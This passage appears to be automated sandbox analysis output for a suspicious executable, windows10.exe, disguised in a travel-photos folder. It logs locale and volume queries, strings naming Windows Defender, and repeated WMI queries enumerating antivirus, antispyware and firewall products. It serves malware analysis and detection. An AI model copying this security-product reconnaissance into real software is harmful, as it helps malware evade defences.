            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: EnumSystemLocalesW,3_2_00B136B6
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: EnumSystemLocalesW,3_2_00B0C7A2
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: EnumSystemLocalesW,3_2_00B1379C
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: EnumSystemLocalesW,3_2_00B13701
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00B13827
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoW,3_2_00B13A7A
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00B13BA3
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoW,3_2_00B13CA9
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoW,3_2_00B0CD1F
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00B13D78
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoEx,4_2_00B071C1
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoEx,FormatMessageA,4_2_00AF2161
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: EnumSystemLocalesW,4_2_00B236B6
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: EnumSystemLocalesW,4_2_00B1C7A2
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: EnumSystemLocalesW,4_2_00B2379C
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: EnumSystemLocalesW,4_2_00B23701
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00B23827
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoW,4_2_00B23A7A
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00B23BA3
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoW,4_2_00B23CA9
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetLocaleInfoW,4_2_00B1CD1F
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00B23D78
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF8615 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00AF8615
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0D192 GetTimeZoneInformation,3_2_00B0D192
            Source: windows10.exe, 0000001E.00000003.2674334142.000000000070F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
            Source: windows10.exe, 0000001D.00000002.4201784055.0000000000876000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000002.4159390497.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011022343.0000000000713000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3121597081.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2890489364.0000000000701000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.0000000000701000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.0000000000711000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.0000000000702000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3006704760.000000000070F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: windows10.exe, 0000001E.00000003.3406241581.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
